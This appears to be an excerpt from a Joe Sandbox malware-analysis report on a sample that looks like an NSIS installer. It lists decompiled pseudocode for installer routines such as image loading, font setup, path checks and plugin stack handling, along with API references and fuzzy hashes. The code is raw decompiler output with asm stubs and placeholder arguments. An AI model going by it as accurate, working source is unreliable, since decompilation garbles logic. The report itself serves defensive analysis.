                                                  					_t38 = E00402DA6(0x11);
                                                  				}
                                                  				 *(_t65 - 0x44) = _t38;
                                                  				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                  				asm("sbb esi, esi");
                                                  				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                  				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                  				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                  					DeleteObject(_t48);
                                                  				}
                                                  				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                  					_push(_t63);
                                                  					E00406484();
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                  				return 0;
                                                  			}











                                                  0x00401d81
                                                  0x00401d85
                                                  0x00401d9a
                                                  0x00401d87
                                                  0x00401d89
                                                  0x00401d8f
                                                  0x00401d8f
                                                  0x00401da0
                                                  0x00401da3
                                                  0x00401dad
                                                  0x00401db0
                                                  0x00401db8
                                                  0x00401dc9
                                                  0x00401dcc
                                                  0x00401dd7
                                                  0x00401dce
                                                  0x00401dd0
                                                  0x00401dd0
                                                  0x00401ddb
                                                  0x00401de5
                                                  0x00401e0c
                                                  0x00401e1b
                                                  0x00401e29
                                                  0x00401e31
                                                  0x00401e39
                                                  0x00401e39
                                                  0x00401e42
                                                  0x00401e48
                                                  0x00402ba4
                                                  0x00402ba4
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                  • GetClientRect.USER32(?,?), ref: 00401DE5
                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                  • DeleteObject.GDI32(00000000), ref: 00401E39
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                  • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                  • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                  • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 73%
                                                  			E00401E4E(intOrPtr __edx) {
                                                  				void* __edi;
                                                  				int _t9;
                                                  				signed char _t15;
                                                  				struct HFONT__* _t18;
                                                  				intOrPtr _t30;
                                                  				void* _t31;
                                                  				struct HDC__* _t33;
                                                  				void* _t35;
                                                  
                                                  				_t30 = __edx;
                                                  				_t33 = GetDC( *(_t35 - 8));
                                                  				_t9 = E00402D84(2);
                                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                  				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                  				ReleaseDC( *(_t35 - 8), _t33);
                                                  				 *0x40ce00 = E00402D84(3);
                                                  				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                  				 *0x40ce07 = 1;
                                                  				 *0x40ce04 = _t15 & 0x00000001;
                                                  				 *0x40ce05 = _t15 & 0x00000002;
                                                  				 *0x40ce06 = _t15 & 0x00000004;
                                                  				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                                                  				_t18 = CreateFontIndirectW(0x40cdf0);
                                                  				_push(_t18);
                                                  				_push(_t31);
                                                  				E00406484();
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                  				return 0;
                                                  			}











                                                  0x00401e4e
                                                  0x00401e59
                                                  0x00401e5b
                                                  0x00401e68
                                                  0x00401e7f
                                                  0x00401e84
                                                  0x00401e91
                                                  0x00401e96
                                                  0x00401e9a
                                                  0x00401ea5
                                                  0x00401eac
                                                  0x00401ebe
                                                  0x00401ec4
                                                  0x00401ec9
                                                  0x00401ed3
                                                  0x00402638
                                                  0x0040156d
                                                  0x00402ba4
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E51
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                    • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                    • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00000000), ref: 00406779
                                                  • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 2584051700-0
                                                  • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                  • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                  • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                  • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E710816BD(struct HINSTANCE__* _a4, short* _a8) {
                                                  				_Unknown_base(*)()* _t7;
                                                  				void* _t10;
                                                  				int _t14;
                                                  
                                                  				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                  				_t10 = GlobalAlloc(0x40, _t14);
                                                  				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                  				_t7 = GetProcAddress(_a4, _t10);
                                                  				GlobalFree(_t10);
                                                  				return _t7;
                                                  			}






                                                  0x710816d7
                                                  0x710816e3
                                                  0x710816f0
                                                  0x710816f7
                                                  0x71081700
                                                  0x7108170c

                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,710822D8,?,00000808), ref: 710816D5
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,710822D8,?,00000808), ref: 710816DC
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,710822D8,?,00000808), ref: 710816F0
                                                  • GetProcAddress.KERNEL32(710822D8,00000000), ref: 710816F7
                                                  • GlobalFree.KERNEL32(00000000), ref: 71081700
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.970618355.0000000071081000.00000020.00000001.01000000.00000004.sdmp, Offset: 71080000, based on PE: true
                                                  • Associated: 00000000.00000002.970532047.0000000071080000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970731155.0000000071084000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970830151.0000000071086000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71080000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                  • String ID:
                                                  • API String ID: 1148316912-0
                                                  • Opcode ID: ae77977b03891f298ffd3d9be62eae42020069749a380a490a4cb6e36a6b97ed
                                                  • Instruction ID: 2202c03006b5a9d35901bc619a2318e4773d0e588aca1675a3cecb3d24ca424e
                                                  • Opcode Fuzzy Hash: ae77977b03891f298ffd3d9be62eae42020069749a380a490a4cb6e36a6b97ed
                                                  • Instruction Fuzzy Hash: 5AF0AC7320E1387FD62116A78C4CE9BBE9CDF8B2F5B210215F628D219086725D02DBF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                  				char _v68;
                                                  				char _v132;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t23;
                                                  				signed int _t24;
                                                  				void* _t31;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				void* _t44;
                                                  				signed int _t46;
                                                  				signed int _t50;
                                                  				signed int _t52;
                                                  				signed int _t53;
                                                  				signed int _t55;
                                                  
                                                  				_t23 = _a16;
                                                  				_t53 = _a12;
                                                  				_t44 = 0xffffffdc;
                                                  				if(_t23 == 0) {
                                                  					_push(0x14);
                                                  					_pop(0);
                                                  					_t24 = _t53;
                                                  					if(_t53 < 0x100000) {
                                                  						_push(0xa);
                                                  						_pop(0);
                                                  						_t44 = 0xffffffdd;
                                                  					}
                                                  					if(_t53 < 0x400) {
                                                  						_t44 = 0xffffffde;
                                                  					}
                                                  					if(_t53 < 0xffff3333) {
                                                  						_t52 = 0x14;
                                                  						asm("cdq");
                                                  						_t24 = 1 / _t52 + _t53;
                                                  					}
                                                  					_t25 = _t24 & 0x00ffffff;
                                                  					_t55 = _t24 >> 0;
                                                  					_t46 = 0xa;
                                                  					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                  				} else {
                                                  					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                  					_t50 = 0;
                                                  				}
                                                  				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                  				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                  				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                  				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                  				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                  			}



















                                                  0x00404d4f
                                                  0x00404d54
                                                  0x00404d5c
                                                  0x00404d5d
                                                  0x00404d6a
                                                  0x00404d72
                                                  0x00404d73
                                                  0x00404d75
                                                  0x00404d77
                                                  0x00404d79
                                                  0x00404d7c
                                                  0x00404d7c
                                                  0x00404d83
                                                  0x00404d89
                                                  0x00404d89
                                                  0x00404d90
                                                  0x00404d97
                                                  0x00404d9a
                                                  0x00404d9d
                                                  0x00404d9d
                                                  0x00404da1
                                                  0x00404db1
                                                  0x00404db3
                                                  0x00404db6
                                                  0x00404d5f
                                                  0x00404d5f
                                                  0x00404d66
                                                  0x00404d66
                                                  0x00404dbe
                                                  0x00404dc9
                                                  0x00404ddf
                                                  0x00404df0
                                                  0x00404e0c

                                                  APIs
                                                  • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                  • wsprintfW.USER32 ref: 00404DF0
                                                  • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                  • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                  • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                  • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
                                                  			E00405F14(void* __eflags, intOrPtr _a4) {
                                                  				int _t11;
                                                  				signed char* _t12;
                                                  				intOrPtr _t18;
                                                  				intOrPtr* _t21;
                                                  				signed int _t23;
                                                  
                                                  				E0040653D(0x42fa70, _a4);
                                                  				_t21 = E00405EB7(0x42fa70);
                                                  				if(_t21 != 0) {
                                                  					E004067C4(_t21);
                                                  					if(( *0x434f18 & 0x00000080) == 0) {
                                                  						L5:
                                                  						_t23 = _t21 - 0x42fa70 >> 1;
                                                  						while(1) {
                                                  							_t11 = lstrlenW(0x42fa70);
                                                  							_push(0x42fa70);
                                                  							if(_t11 <= _t23) {
                                                  								break;
                                                  							}
                                                  							_t12 = E00406873();
                                                  							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                  								E00405E58(0x42fa70);
                                                  								continue;
                                                  							} else {
                                                  								goto L1;
                                                  							}
                                                  						}
                                                  						E00405E0C();
                                                  						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                  					}
                                                  					_t18 =  *_t21;
                                                  					if(_t18 == 0 || _t18 == 0x5c) {
                                                  						goto L1;
                                                  					} else {
                                                  						goto L5;
                                                  					}
                                                  				}
                                                  				L1:
                                                  				return 0;
                                                  			}








                                                  0x00405f20
                                                  0x00405f2b
                                                  0x00405f2f
                                                  0x00405f36
                                                  0x00405f42
                                                  0x00405f52
                                                  0x00405f54
                                                  0x00405f6c
                                                  0x00405f6d
                                                  0x00405f74
                                                  0x00405f75
                                                  0x00000000
                                                  0x00000000
                                                  0x00405f58
                                                  0x00405f5f
                                                  0x00405f67
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405f5f
                                                  0x00405f77
                                                  0x00000000
                                                  0x00405f8b
                                                  0x00405f44
                                                  0x00405f4a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405f4a
                                                  0x00405f31
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                    • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 4Su,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75533420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                  • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 4Su,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75533420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                  • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4Su,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75533420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: 4Su$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 3248276644-3642554223
                                                  • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                  • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                  • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                  • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00405E0C(WCHAR* _a4) {
                                                  				WCHAR* _t9;
                                                  
                                                  				_t9 = _a4;
                                                  				_push( &(_t9[lstrlenW(_t9)]));
                                                  				_push(_t9);
                                                  				if( *(CharPrevW()) != 0x5c) {
                                                  					lstrcatW(_t9, 0x40a014);
                                                  				}
                                                  				return _t9;
                                                  			}




                                                  0x00405e0d
                                                  0x00405e1a
                                                  0x00405e1b
                                                  0x00405e26
                                                  0x00405e2e
                                                  0x00405e2e
                                                  0x00405e36

                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3355392842
                                                  • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                  • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                  • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                  • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E710810E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                  				void* _v0;
                                                  				void* _t27;
                                                  				signed int _t29;
                                                  				void* _t30;
                                                  				void* _t34;
                                                  				void* _t36;
                                                  				void* _t38;
                                                  				void* _t40;
                                                  				void* _t48;
                                                  				void* _t54;
                                                  				void* _t63;
                                                  				void* _t64;
                                                  				signed int _t66;
                                                  				void* _t67;
                                                  				void* _t73;
                                                  				void* _t74;
                                                  				void* _t77;
                                                  				void* _t80;
                                                  				void _t81;
                                                  				void _t82;
                                                  				intOrPtr _t84;
                                                  				void* _t86;
                                                  				void* _t88;
                                                  
                                                  				 *0x7108506c = _a8;
                                                  				 *0x71085070 = _a16;
                                                  				 *0x71085074 = _a12;
                                                  				_a12( *0x71085048, E71081651, _t73);
                                                  				_t66 =  *0x7108506c +  *0x7108506c * 4 << 3;
                                                  				_t27 = E710812E3();
                                                  				_v0 = _t27;
                                                  				_t74 = _t27;
                                                  				if( *_t27 == 0) {
                                                  					L28:
                                                  					return GlobalFree(_t27);
                                                  				}
                                                  				do {
                                                  					_t29 =  *_t74 & 0x0000ffff;
                                                  					_t67 = 2;
                                                  					_t74 = _t74 + _t67;
                                                  					_t88 = _t29 - 0x66;
                                                  					if(_t88 > 0) {
                                                  						_t30 = _t29 - 0x6c;
                                                  						if(_t30 == 0) {
                                                  							L23:
                                                  							_t31 =  *0x71085040;
                                                  							if( *0x71085040 == 0) {
                                                  								goto L26;
                                                  							}
                                                  							E71081603( *0x71085074, _t31 + 4, _t66);
                                                  							_t34 =  *0x71085040;
                                                  							_t86 = _t86 + 0xc;
                                                  							 *0x71085040 =  *_t34;
                                                  							L25:
                                                  							GlobalFree(_t34);
                                                  							goto L26;
                                                  						}
                                                  						_t36 = _t30 - 4;
                                                  						if(_t36 == 0) {
                                                  							L13:
                                                  							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                  							_t74 = _t74 + _t67;
                                                  							_t34 = E71081312(E7108135A(_t38));
                                                  							L14:
                                                  							goto L25;
                                                  						}
                                                  						_t40 = _t36 - _t67;
                                                  						if(_t40 == 0) {
                                                  							L11:
                                                  							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                  							_t74 = _t74 + _t67;
                                                  							_t34 = E71081381(_t80, E710812E3());
                                                  							goto L14;
                                                  						}
                                                  						L8:
                                                  						if(_t40 == 1) {
                                                  							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                  							_t10 = _t81 + 4; // 0x4
                                                  							E71081603(_t10,  *0x71085074, _t66);
                                                  							_t86 = _t86 + 0xc;
                                                  							 *_t81 =  *0x71085040;
                                                  							 *0x71085040 = _t81;
                                                  						}
                                                  						goto L26;
                                                  					}
                                                  					if(_t88 == 0) {
                                                  						_t48 =  *0x71085070;
                                                  						_t77 =  *_t48;
                                                  						 *_t48 =  *_t77;
                                                  						_t49 = _v0;
                                                  						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                  						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                  							E71081603(_t49, _t77 + 8, 0x38);
                                                  							_t86 = _t86 + 0xc;
                                                  						}
                                                  						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                  						GlobalFree(_t77);
                                                  						goto L26;
                                                  					}
                                                  					_t54 = _t29 - 0x46;
                                                  					if(_t54 == 0) {
                                                  						_t82 = GlobalAlloc(0x40,  *0x7108506c +  *0x7108506c + 8);
                                                  						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                  						_t14 = _t82 + 8; // 0x8
                                                  						E71081603(_t14, _v0, 0x38);
                                                  						_t86 = _t86 + 0xc;
                                                  						 *_t82 =  *( *0x71085070);
                                                  						 *( *0x71085070) = _t82;
                                                  						goto L26;
                                                  					}
                                                  					_t63 = _t54 - 6;
                                                  					if(_t63 == 0) {
                                                  						goto L23;
                                                  					}
                                                  					_t64 = _t63 - 4;
                                                  					if(_t64 == 0) {
                                                  						 *_t74 =  *_t74 + 0xa;
                                                  						goto L13;
                                                  					}
                                                  					_t40 = _t64 - _t67;
                                                  					if(_t40 == 0) {
                                                  						 *_t74 =  *_t74 + 0xa;
                                                  						goto L11;
                                                  					}
                                                  					goto L8;
                                                  					L26:
                                                  				} while ( *_t74 != 0);
                                                  				_t27 = _v0;
                                                  				goto L28;
                                                  			}


























                                                  0x710810eb
                                                  0x71081100
                                                  0x71081109
                                                  0x7108110e
                                                  0x71081119
                                                  0x7108111c
                                                  0x71081125
                                                  0x71081129
                                                  0x7108112b
                                                  0x710812b0
                                                  0x710812ba
                                                  0x710812ba
                                                  0x71081132
                                                  0x71081132
                                                  0x71081137
                                                  0x71081138
                                                  0x7108113a
                                                  0x7108113d
                                                  0x71081256
                                                  0x71081259
                                                  0x71081271
                                                  0x71081271
                                                  0x71081278
                                                  0x00000000
                                                  0x00000000
                                                  0x71081285
                                                  0x7108128a
                                                  0x7108128f
                                                  0x71081294
                                                  0x7108129a
                                                  0x7108129b
                                                  0x00000000
                                                  0x7108129b
                                                  0x7108125b
                                                  0x7108125e
                                                  0x710811bc
                                                  0x710811bf
                                                  0x710811c2
                                                  0x710811cb
                                                  0x710811d0
                                                  0x00000000
                                                  0x710811d1
                                                  0x71081264
                                                  0x71081266
                                                  0x710811a2
                                                  0x710811a5
                                                  0x710811a8
